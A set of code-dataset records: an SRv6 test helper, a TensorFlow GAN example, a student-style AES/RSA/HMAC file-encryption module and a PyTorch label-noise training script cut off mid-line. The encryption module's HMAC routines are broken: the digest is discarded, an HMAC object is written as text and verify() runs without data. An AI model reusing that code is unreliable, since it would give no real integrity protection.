vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_add_del.vat', params=params, bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 policy for bsid {0} failed on node {1}'.format(\n bsid, node['host']))\n\n @staticmethod\n def show_sr_steering_policies(node):\n \"\"\"Show SRv6 steering policies on the given node.\n\n :param node: Given node to show SRv6 steering policies on.\n :type node: dict\n \"\"\"\n with VatTerminal(node, json_param=False) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_policies_show.vat')\n","sub_path":"resources/libraries/python/SRv6.py","file_name":"SRv6.py","file_ext":"py","file_size_in_byte":11215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"400232648","text":"import tensorflow as tf\nfrom easydict import EasyDict as edict\nfrom tensorflow.python import keras\nfrom tensorflow.python.keras import layers\n\nfrom gans.callbacks import saver\nfrom gans.models import sequential\nfrom gans.trainers import optimizers\nfrom gans.trainers import vanilla_gan_trainer\n\nmodel_parameters = edict({\n 'batch_size': 256,\n 'num_epochs': 15,\n 'buffer_size': 100000,\n 'latent_size': 5,\n 'learning_rate_generator': 0.0002,\n 'learning_rate_discriminator': 0.0002,\n 'save_images_every_n_steps': 20\n})\n\n\ndef generate_samples(num_samples):\n x = tf.random.uniform(shape=[num_samples], minval=-10, maxval=10)\n y = tf.nn.sigmoid(x)\n data = tf.stack([x, y], axis=1)\n return tf.data.Dataset. \\\n from_tensor_slices(data). \\\n shuffle(model_parameters.buffer_size). \\\n batch(model_parameters.batch_size)\n\n\ndataset = generate_samples(num_samples=500000)\n\n\ndef validation_dataset():\n return tf.random.normal([model_parameters.batch_size, model_parameters.latent_size])\n\n\nvalidation_dataset = validation_dataset()\n\ngenerator = sequential.SequentialModel(\n layers=[\n keras.Input(shape=[model_parameters.latent_size]),\n layers.Dense(units=15),\n layers.ELU(),\n layers.Dense(units=10),\n layers.ELU(),\n layers.Dense(units=5),\n layers.ELU(),\n layers.Dense(units=2, activation='linear'),\n ]\n)\n\ndiscriminator = sequential.SequentialModel(\n [\n keras.Input(shape=[2]),\n layers.Dense(units=25, activation='relu'),\n layers.Dense(units=15, activation='relu'),\n layers.Dense(units=10, activation='relu'),\n layers.Dense(units=2, activation='sigmoid'),\n ]\n)\n\ngenerator_optimizer = optimizers.Adam(\n learning_rate=model_parameters.learning_rate_generator,\n beta_1=0.5,\n)\ndiscriminator_optimizer = optimizers.Adam(\n learning_rate=model_parameters.learning_rate_discriminator,\n beta_1=0.5,\n)\n\ncallbacks = [\n saver.FunctionProblemSaver(\n save_images_every_n_steps=model_parameters.save_images_every_n_steps,\n )\n]\n\ngan_trainer = vanilla_gan_trainer.VanillaGANTrainer(\n batch_size=model_parameters.batch_size,\n generator=generator,\n discriminator=discriminator,\n training_name='VANILLA_GAN_MODEL_SIGMOID',\n generator_optimizer=generator_optimizer,\n discriminator_optimizer=discriminator_optimizer,\n latent_size=model_parameters.latent_size,\n continue_training=False,\n save_images_every_n_steps=model_parameters.save_images_every_n_steps,\n validation_dataset=validation_dataset,\n callbacks=callbacks,\n)\n\ngan_trainer.train(\n dataset=dataset,\n num_epochs=model_parameters.num_epochs,\n)\n","sub_path":"Experimentation/MnistGAN/gans2/examples/vanilla_gan_function_modeling_sigmoid.py","file_name":"vanilla_gan_function_modeling_sigmoid.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"398983794","text":"import os\r\nimport os.path\r\nimport base64\r\nimport json\r\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\r\nfrom cryptography.hazmat.backends import default_backend\r\nfrom cryptography.hazmat.primitives import padding as paddingPK\r\nfrom cryptography.hazmat.primitives.asymmetric import padding as paddingOA\r\nfrom cryptography.hazmat.primitives.asymmetric import rsa\r\nfrom cryptography.hazmat.primitives import serialization\r\nfrom cryptography.hazmat.primitives import hashes, hmac\r\n\r\nbackend = default_backend()\r\n\r\ndef Myencrypt(message, key):\r\n # Check to see if the key is at least 32 bytes\r\n if(len(key) < 32):\r\n raise ValueError('The key is too short! (Must be 32 bytes in length.)')\r\n \r\n # Generate iv and initialized ciper and encryptor objects\r\n iv = os.urandom(16)\r\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)\r\n encryptor = cipher.encryptor()\r\n \r\n # Initialize the padder object\r\n padder = paddingPK.PKCS7(128).padder()\r\n # Techinically useless but too scared to remove\r\n byte_message = message\r\n # Adds padding to the data\r\n padded_data = padder.update(byte_message)\r\n padded_data += padder.finalize()\r\n \r\n # Encrypt the padded data\r\n ct = encryptor.update(padded_data) + encryptor.finalize()\r\n \r\n # Store the ct and iv in a dictionary\r\n temp_data = {}\r\n temp_data['ct'] = ct\r\n temp_data['iv'] = iv\r\n \r\n return temp_data\r\n\r\n\r\ndef Mydecrypt(ciphertext, key, iv):\r\n # Initialize the cipher and decryptor objects\r\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)\r\n decryptor = cipher.decryptor()\r\n \r\n # Decrypts the padded data\r\n padded_data = decryptor.update(ciphertext) + decryptor.finalize()\r\n \r\n # Initializes the unpadder object\r\n unpadder = paddingPK.PKCS7(128).unpadder()\r\n \r\n # Unpad the data\r\n data = unpadder.update(padded_data)\r\n data += unpadder.finalize()\r\n return data\r\n\r\n\r\ndef Myfileencrypt(filepath):\r\n # Generate a random key\r\n key = os.urandom(32)\r\n \r\n # Extract the filename and extension\r\n file_name = os.path.basename(filepath)\r\n extension = os.path.splitext(file_name)[1]\r\n \r\n # Check if the file is a text file or an image\r\n # Then opens the file and stores the data\r\n with open(filepath, \"rb\") as file:\r\n file_data = file.read()\r\n\r\n # Encrypt the data\r\n enc_data = Myencrypt(file_data, key)\r\n \r\n # Encode the ciphertext\r\n ct = enc_data['ct']\r\n b64_ct = base64.b64encode(ct)\r\n str_ct = b64_ct.decode(\"utf-8\") \r\n \r\n # Encode the iv\r\n iv = enc_data['iv']\r\n b64_iv = base64.b64encode(iv)\r\n str_iv = b64_iv.decode(\"utf-8\") \r\n \r\n # Encode the key\r\n b64_key = base64.b64encode(key)\r\n str_key = b64_key.decode(\"utf-8\")\r\n \r\n # Store the data into a dictionary\r\n temp_data = {}\r\n temp_data['ct'] = str_ct\r\n temp_data['iv'] = str_iv\r\n temp_data['file_name'] = file_name\r\n temp_data['ext'] = extension\r\n temp_data['key'] = str_key\r\n \r\n # Convert the dictionary to a JSON\r\n json_str = json.dumps(temp_data)\r\n\r\n # Write the JSON to disk\r\n fh = open(file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Return JSON filepath\r\n return file_name + \" json.txt\"\r\n \r\n\r\n # Input is JSON filepath\r\ndef Myfiledecrypt(json_filepath):\r\n \r\n # Read JSON from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # Convert JSON to dictionary\r\n data = json.loads(json_str)\r\n \r\n # Extract the data in the dictionary\r\n key = data['key']\r\n ext = data['ext']\r\n iv = data['iv']\r\n file_name = data['file_name']\r\n \r\n # Decode the ct\r\n str_ct = data['ct']\r\n b64_ct = str_ct.encode(\"utf-8\")\r\n ct = base64.b64decode(b64_ct)\r\n \r\n # Decode the iv\r\n str_iv = data['iv']\r\n b64_iv = str_iv.encode(\"utf-8\")\r\n iv = base64.b64decode(b64_iv)\r\n \r\n # Decode the key\r\n str_key = data['key']\r\n b64_key = str_key.encode(\"utf-8\")\r\n key = base64.b64decode(b64_key)\r\n \r\n # Decrypt the ciphertext\r\n pt = Mydecrypt(ct, key, iv)\r\n \r\n # Check if the file is a text file or an image\r\n # Then generate a new file with the unencrypted data\r\n fh = open(file_name + \" unencrypted\" + ext, \"wb\")\r\n fh.write(pt)\r\n fh.close()\r\n \r\n return file_name + \" unencrypted\" + ext\r\n \r\ndef MyRSAEncrypt(filepath, RSA_publickey_filepath):\r\n \r\n # Encrypt the file data\r\n enc_data = Myfileencrypt(filepath)\r\n \r\n # Extract the data from the JSON\r\n with open(enc_data, \"rb\") as file:\r\n json_str = file.read()\r\n data = json.loads(json_str)\r\n ct = data['ct']\r\n iv = data['iv']\r\n ext = data['ext']\r\n file_name = data['file_name']\r\n str_key = data['key']\r\n \r\n # Read the RSA public key from disk\r\n with open(RSA_publickey_filepath, \"rb\") as key_file:\r\n public_key = serialization.load_pem_public_key(\r\n key_file.read(),\r\n backend=default_backend()\r\n )\r\n \r\n # Decode the key\r\n b64_key = str_key.encode(\"utf-8\")\r\n key = base64.b64decode(b64_key)\r\n \r\n # Encrypt the key\r\n RSA_ct = public_key.encrypt(\r\n key,\r\n paddingOA.OAEP(\r\n mgf=paddingOA.MGF1(algorithm=hashes.SHA256()),\r\n algorithm=hashes.SHA256(),\r\n label=None\r\n )\r\n )\r\n # Encode the ciphertext\r\n b64_RSA_ct = base64.b64encode(RSA_ct)\r\n str_RSA_ct = b64_RSA_ct.decode(\"utf-8\")\r\n \r\n # Package everything into a dictionary\r\n dict_data = {}\r\n dict_data['RSAcipher'] = str_RSA_ct\r\n dict_data['ct'] = ct\r\n dict_data['iv'] = iv\r\n dict_data['ext'] = ext\r\n dict_data['file_name'] = file_name\r\n \r\n # Convert the dictionary to a JSON\r\n json_str = json.dumps(dict_data)\r\n\r\n # Write the JSON to disk\r\n fh = open(file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Return JSON filepath\r\n return file_name + \" json.txt\"\r\n \r\ndef MyRSADecrypt(json_filepath):\r\n \r\n # Read JSON from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # Convert JSON to dictionary\r\n data = json.loads(json_str)\r\n \r\n # Unpackage the dictionary\r\n str_RSA_ct = data['RSAcipher']\r\n ct = data['ct']\r\n iv = data['iv']\r\n ext = data['ext']\r\n file_name = data['file_name']\r\n \r\n # Decode the ciphertext\r\n b64_RSA_ct = str_RSA_ct.encode(\"utf-8\") \r\n RSA_ct = base64.b64decode(b64_RSA_ct)\r\n \r\n # Read the private key from disk\r\n pr_key_path = \"RSA private key.pem\"\r\n with open(pr_key_path, \"rb\") as key_file:\r\n private_key = serialization.load_pem_private_key(\r\n key_file.read(),\r\n password=None,\r\n backend=default_backend()\r\n )\r\n # Decrypt the key\r\n key = private_key.decrypt(\r\n RSA_ct,\r\n paddingOA.OAEP(\r\n mgf=paddingOA.MGF1(algorithm=hashes.SHA256()),\r\n algorithm=hashes.SHA256(),\r\n label=None\r\n )\r\n )\r\n \r\n # Encode the key\r\n b64_key = base64.b64encode(key)\r\n str_key = b64_key.decode(\"utf-8\")\r\n \r\n # Generate a new JSON to pass into Myfiledecrypt\r\n dict_data = {}\r\n dict_data['ct'] = ct\r\n dict_data['iv'] = iv\r\n dict_data['ext'] = ext\r\n dict_data['file_name'] = file_name\r\n dict_data['key'] = str_key\r\n \r\n json_str = json.dumps(dict_data)\r\n \r\n fh = open(\"new\" + file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Decrypt the file\r\n unenc_path = Myfiledecrypt(\"new\" + file_name + \" json.txt\")\r\n \r\n # Return the unencrypted file's path\r\n return unenc_path\r\n\r\n\r\ndef MyencryptMAC(message, EncKey, HMACKey):\r\n \r\n # Encrypt the file\r\n json_filepath = MyRSAEncrypt(message, EncKey)\r\n \r\n # Read the file from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # HMAC the file\r\n h = hmac.HMAC(HMACKey, hashes.SHA256(), backend=default_backend())\r\n h.update(json_str)\r\n h.finalize()\r\n \r\n # Extract the filename\r\n file_name = os.path.basename(json_filepath)\r\n \r\n # Write the hash to disk\r\n fh = open(file_name + \" HMAC.txt\", \"w\")\r\n fh.write(h)\r\n \r\n # Return the hash filepath\r\n return file_name + \" HMAC.txt\"\r\n\r\ndef MydecryptMAC(HMAC_filepath, HMACkey, json_filepath):\r\n \r\n # Read the file from disk\r\n with open(HMAC_filepath, \"rb\") as file:\r\n HMAC_str = file.read()\r\n \r\n # Verify the file\r\n h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n h.verify(HMAC_str)\r\n \r\n # Decrypt the file\r\n pt_filepath = MyRSADecrypt(json_filepath)\r\n \r\n # Return the plaintext filepath\r\n return pt_filepath\r\n \r\ndef MyfileEncryptMAC(filepath, HMACkey, RSA_publickey_filepath):\r\n \r\n # Encrypt the file\r\n json_filepath = MyRSAEncrypt(filepath, RSA_publickey_filepath)\r\n \r\n #Read the file from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # HMAC the file\r\n h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n h.update(json_str)\r\n h.finalize()\r\n \r\n # Extract the filename\r\n file_name = os.path.basename(json_filepath)\r\n \r\n # Write the hash to disk\r\n fh = open(file_name + \" HMAC.txt\", \"w\")\r\n fh.write(h)\r\n \r\n # Return the hash filepath\r\n return file_name + \" HMAC.txt\"\r\n\r\n\r\ndef MyfileDecryptMAC(HMAC_filepath, HMACkey, json_filepath):\r\n \r\n # Read the HMAC file from disk\r\n with open(HMAC_filepath, \"rb\") as file:\r\n HMAC_str = file.read()\r\n \r\n # Verify the file\r\n h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n h.verify(HMAC_str)\r\n \r\n # Decrypt the file\r\n pt_filepath = Myfiledecrypt(json_filepath)\r\n \r\n # Return the plaintext filepath\r\n return pt_filepath","sub_path":"MyEncrypt/myEncrypt.py","file_name":"myEncrypt.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"511727431","text":"# original code: https://github.com/dyhan0920/PyramidNet-PyTorch/blob/master/train.py\nimport sys\nimport time \nimport argparse\nimport os\nimport shutil\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\n\nfrom models import resnet as RN\nfrom models import pyramidnet as PYRM\nfrom models import vgg as VGG\nfrom models import wideresnet as WR \nfrom models import shufflenetv2 as SN\nfrom models import mobilenetv2 as MN\nfrom models import resnext as RNX\nfrom models import densenet as DN\nfrom models.iccv19_resnet import *\n#from models.iccv19_resnet_ds import *\nfrom models.preactresnet import CIFAR_ResNet18, CIFAR_ResNet34 \nfrom tensorboardX import SummaryWriter\nfrom loss_all_methods import SCELoss, label_smooth, generalized_cross_entropy, joint_optimization, boot_soft, boot_hard, Forward, Backward, DisturbLabel, PC\nimport random\nimport utils\nimport numpy as np\nimport cv2\nimport warnings\nimport random\nfrom PIL import Image, ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES=True\n\nwarnings.filterwarnings(\"ignore\")\n\nmodel_names = sorted(name for name in models.__dict__\n if name.islower() and not name.startswith(\"__\")\n and callable(models.__dict__[name]))\n \n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR-10, CIFAR-100 and ImageNet-1k Training')\nparser.add_argument('--net_type', default='pyramidnet', type=str,\n help='networktype: resnet, and pyamidnet')\nparser.add_argument('-j', '--workers', default=16, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--start_epoch', default=0, type=int, metavar='N',\n help='start epoch to run')\nparser.add_argument('--epochs', default=90, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('-b', '--batch_size', default=128, type=int,\n metavar='N', help='mini-batch size (default: 256)')\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--print-freq', '-p', default=1000, type=int,\n metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--depth', default=32, type=int,\n help='depth of the network (default: 32)')\nparser.add_argument('--no-bottleneck', dest='bottleneck', action='store_false',\n help='to use basicblock for CIFAR datasets (default: bottleneck)')\nparser.add_argument('--dataset', dest='dataset', default='imagenet', type=str,\n help='dataset (options: cifar10, cifar100, and imagenet)')\nparser.add_argument('--no-verbose', dest='verbose', action='store_false',\n help='to print the status at every iteration')\n#parser.add_argument('--alpha', default=300, type=float,\n# help='number of new channel increases per depth (default: 300)')\nparser.add_argument('--expname', default='TEST', type=str,\n help='name of experiment')\nparser.add_argument('--save_dir', default='./', type=str,\n help='model saved dir')\nparser.add_argument('--seed', type=int, default=2019, help='random seed')\nparser.add_argument('--resume', default=None, type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('--pretrained', default='./runs/pretrained_model/resnet50-19c8e357.pth', type=str, metavar='PATH',\n\t\t\t\t\thelp='path to resnet50 pretrained pth.')\nparser.add_argument('--dali_cpu', action='store_true',\n help='Runs CPU based version of DALI pipeline.')\nparser.add_argument('--width', default=None, type=int, help='the widen factor of wideresnet')\n\nparser.add_argument(\"--local_rank\", default=0, type=int)\nparser.add_argument(\"--phase\", default=None, type=int)\n\nparser.add_argument('--theta', default=0.5, type=float)\nparser.add_argument('--method', default=None, type=str, help='ce, sce, ls, gce, jo, bootsoft, boothard, forward, backward, disturb')\nparser.add_argument('--olsalpha', default=None, type=float)\nparser.add_argument('--T', default=1.0, type=float, help='temprature to scale')\n\nparser.set_defaults(bottleneck=True)\nparser.set_defaults(verbose=True)\n\nbest_err1 = 100\nbest_err5 = 100\nnumberofclass = 1000\n\ndef main():\n global args, best_err1, best_err5, numberofclass \n args = parser.parse_args()\n \n assert args.method in ['ce', 'ols', 'sce', 'ls', 'gce', 'jo', 'bootsoft', 'boothard', 'forward', 'backward', 'disturb', 'PC'], \\\n \"method must be the one of 'ce', 'sce', 'ls', 'gce', 'jo', 'bootsoft', 'boothard', 'forward', 'backward', 'disturb', 'PC' \"\n \n args.gpu = 0\n args.world_size = 1\n \n print(args)\n log_dir = '%s/runs/record_dir/%s/' % (args.save_dir, args.expname)\n writer = SummaryWriter(log_dir=log_dir)\n \n if args.seed is not None:\n print('set the same seed for all.....')\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n\n\n if args.dataset.startswith('cifar'):\n normalize = transforms.Normalize(mean=[x / 255.0 for x in [125.3, 123.0, 113.9]],\n std=[x / 255.0 for x in [63.0, 62.1, 66.7]])\n\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n normalize\n ])\n\n if args.dataset == 'cifar100':\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR100('./data', train=True, download=True, transform=transform_train),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR100('./data', train=False, transform=transform_test),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n numberofclass = 100\n elif args.dataset == 'cifar10':\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=True, download=True, transform=transform_train),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=False, transform=transform_test),\n batch_size=args.batch_size, shuffle=False, num_workers=args.workers, pin_memory=False)\n numberofclass = 10\n else:\n raise Exception('unknown dataset: {}'.format(args.dataset))\n \n elif args.dataset == 'imagenet':\n traindir = os.path.join('./data/ILSVRC1/train')\n valdir = os.path.join('./data/ILSVRC1/val1')\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n jittering = utils.ColorJitter(brightness=0.4, contrast=0.4,\n saturation=0.4)\n lighting = utils.Lighting(alphastd=0.1,\n eigval=[0.2175, 0.0188, 0.0045],\n eigvec=[[-0.5675, 0.7192, 0.4009],\n [-0.5808, -0.0045, -0.8140],\n [-0.5836, -0.6948, 0.4203]])\n\n train_dataset = datasets.ImageFolder(\n traindir,\n transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n jittering,\n lighting,\n normalize,\n ]))\n\n train_sampler = None\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=(train_sampler is None),\n num_workers=args.workers, pin_memory=False, sampler=train_sampler)\n\n val_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(valdir, transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=False)\n numberofclass = 1000\n\n \n \n print(\"=> creating model '{}'\".format(args.net_type))\n # define loss function (criterion) and optimizer\n solver = Solver()\n\n solver.model = solver.model.cuda()\n print('the number of model parameters: {}'.format(sum([p.data.nelement() for p in solver.model.parameters()])))\n cudnn.benchmark = True\n\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch']\n best_err1 = checkpoint['best_err1']\n solver.model.load_state_dict(checkpoint['state_dict'])\n solver.optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n \n \n for epoch in range(args.start_epoch, args.epochs): \n print('current os time = ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n adjust_learning_rate(solver.optimizer, epoch)\n # train for one epoch\n train_loss = solver.train(train_loader, epoch)\n # evaluate on validation set\n err1, err5, val_loss = solver.validate(val_loader, epoch)\n\n writer.add_scalar('training loss', train_loss, epoch)\n writer.add_scalar('testing loss', val_loss, epoch)\n writer.add_scalar('top1 error', err1, epoch)\n writer.add_scalar('top5 error', err5, epoch)\n\n # remember best prec@1 and save checkpoint\n is_best = err1 <= best_err1\n best_err1 = min(err1, best_err1)\n if is_best:\n best_err5 = err5\n \n print('Current best accuracy (top-1 and 5 error):', best_err1, best_err5)\n save_checkpoint({\n 'epoch': epoch,\n 'arch': args.net_type,\n 'state_dict': solver.model.state_dict(),\n 'best_err1': best_err1,\n 'best_err5': best_err5,\n 'optimizer': solver.optimizer.state_dict(),\n }, is_best)\n\n print('Best accuracy (top-1 and 5 error):', best_err1, best_err5)\n print('method = {}, expname = {}'.format(args.method, args.expname))\n loss_dir = \"%s/runs/record_dir/%s/\" % (args.save_dir, args.expname)\n writer.export_scalars_to_json(loss_dir + 'loss.json')\n writer.close()\n\nclass Solver():\n def __init__(self):\n super(Solver, self).__init__()\n global numberofclass \n \n #define the network\n if args.net_type == 'resnet':\n self.model = RN.ResNet(dataset=args.dataset, depth=args.depth, num_classes=numberofclass, bottleneck=args.bottleneck)\n \n elif args.net_type == 'pyramidnet':\n self.model = PYRM.PyramidNet(args.dataset, args.depth, args.alpha, numberofclass,\n args.bottleneck)\n \n elif args.net_type == 'wideresnet':\n self.model = WR.WideResNet(depth=args.depth, num_classes=numberofclass, widen_factor=args.width)\n \n elif args.net_type == 'vggnet':\n self.model = VGG.vgg16(num_classes=numberofclass)\n \n elif args.net_type == 'mobilenet':\n self.model = MN.mobile_half(num_classes=numberofclass)\n \n elif args.net_type == 'shufflenet':\n self.model = SN.ShuffleV2(num_classes=numberofclass)\n \n elif args.net_type == 'densenet':\n self.model = DN.densenet_cifar(num_classes=numberofclass)\n \n elif args.net_type == 'resnext29-2':\n self.model = RNX.ResNeXt29_2x64d(num_classes=numberofclass)\n elif args.net_type == 'resnext29-4':\n self.model = RNX.ResNeXt29_4x64d(num_classes=numberofclass)\n elif args.net_type == 'resnext29-32':\n self.model = RNX.ResNeXt29_32x4d(num_classes=numberofclass)\n \n elif args.net_type == 'imagenetresnet18':\n self.model = multi_resnet18_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet34':\n self.model = multi_resnet34_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet50':\n self.model = multi_resnet50_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet101':\n self.model = multi_resnet101_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet152':\n self.model = multi_resnet152_kd(num_classes=numberofclass)\n else:\n raise Exception('unknown network architecture: {}'.format(args.net_type))\n\n \n\n \n self.optimizer = torch.optim.SGD(self.model.parameters(), args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay, nesterov=True)\n self.loss_lams = torch.zeros(numberofclass, numberofclass, dtype=torch.float32).cuda()\n self.loss_lams.requires_grad = False \n #define the loss function\n if args.method == 'ce':\n self.criterion = nn.CrossEntropyLoss()\n elif args.method == 'sce':\n if args.dataset == 'cifar10':\n self.criterion = SCELoss(alpha=0.1, beta=1.0, num_classes=numberofclass)\n else:\n self.criterion = SCELoss(alpha=6.0, beta=0.1, num_classes=numberofclass)\n elif args.method == 'ls':\n self.criterion = label_smooth(num_classes=numberofclass)\n elif args.method == 'gce':\n self.criterion = generalized_cross_entropy(num_classes=numberofclass)\n elif args.method == 'jo':\n self.criterion = joint_optimization(num_classes=numberofclass)\n elif args.method == 'bootsoft':\n self.criterion = boot_soft(num_classes=numberofclass)\n elif args.method == 'boothard':\n self.criterion = boot_hard(num_classes=numberofclass)\n elif args.method == 'forward':\n self.criterion = Forward(num_classes=numberofclass)\n elif args.method == 'backward':\n self.criterion = Backward(num_classes=numberofclass)\n elif args.method == 'disturb':\n self.criterion = DisturbLabel(num_classes=numberofclass)\n elif args.method == 'ols':\n self.criterion = nn.CrossEntropyLoss()\n elif args.method == 'PC':\n self.criterion = PC(100)\n self.criterion = self.criterion.cuda()\n \n\n def update_loss_lams(self, output, target):\n with torch.no_grad():\n logits = torch.softmax(output, dim=1)\n sort_args = torch.argsort(logits, dim=1, descending=True)\n for k in range(output.shape[0]):\n if target[k] != sort_args[k, 0]:\n continue\n self.cur_epoch_lams[target[k]] += logits[k]\n self.cur_epoch_cnt[target[k]] += 1\n def update_loss_lams2(self, output, target):\n with torch.no_grad():\n logits = output / args.T\n sort_args = torch.argsort(logits, dim=1, descending=True)\n for k in range(output.shape[0]):\n if target[k] != sort_args[k, 0]:\n continue\n self.cur_epoch_lams[target[k]] += logits[k]\n self.cur_epoch_cnt[target[k]] += 1\n \n \n def soft_cross_entropy(self, output, target): \n target_prob = torch.zeros_like(output)\n batch = output.shape[0]\n for k in range(batch):\n target_prob[k] = self.loss_lams[target[k]]\n log_like = -torch.nn.functional.log_softmax(output, dim=1)\n loss = torch.sum(torch.mul(log_like, target_prob)) / batch \n return loss\n def kd_loss(self, output, target):\n target_prob = torch.zeros_like(output)\n batch = output.shape[0]\n for k in range(batch):\n target_prob[k] = self.loss_lams[target[k]]\n ps = torch.nn.functional.log_softmax(output / args.T, dim=1)\n log_like = torch.nn.functional.kl_div(ps, target_prob, size_average=False)\n log_like = log_like * (args.T ** 2) / batch\n return log_like\n def sce_loss(self, output, onehot):\n log_like = -torch.nn.functional.log_softmax(output, dim=1)\n loss = torch.sum(torch.mul(log_like, onehot)) / output.shape[0]\n return loss\n \n def train(self, train_loader, epoch):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n \n global numberofclass \n\n # switch to train mode\n self.model.train()\n end = time.time()\n current_LR = get_learning_rate(self.optimizer)[0]\n \n self.cur_epoch_lams = torch.zeros(numberofclass, numberofclass, dtype=torch.float32).cuda()\n self.cur_epoch_cnt = torch.zeros(numberofclass, dtype=torch.float32).cuda()\n self.cur_epoch_lams.requires_grad = False\n self.cur_epoch_cnt.requires_grad = False\n for i, (input, target) in enumerate(train_loader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n input = input.cuda()\n target = target.cuda()\n input_var = torch.autograd.Variable(input, requires_grad=True)\n \n \n # compute output\n output = self.model(input_var)\n \n if args.method == 'ols':\n self.update_loss_lams(output, target)\n args.T = 1.\n loss = 0.5 * self.criterion(output, target) + \\\n 0.5 * self.soft_cross_entropy(output, target)\n elif args.method == 'ls':\n loss = self.criterion(output, target)\n elif args.method == 'PC':\n if epoch < 200:\n loss = torch.nn.functional.cross_entropy(output, \\\n target)\n else:\n loss = self.criterion(output, target)\n else:\n loss = self.criterion(output, target)\n \n #measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # compute gradient and do SGD step\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n \n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n \n \n \n if i % args.print_freq == 0 and args.verbose == True:\n print('Epoch: [{0}/{1}][{2}/{3}]\\t'\n 'LR: {LR:.6f}\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, len(train_loader), LR=current_LR, batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, 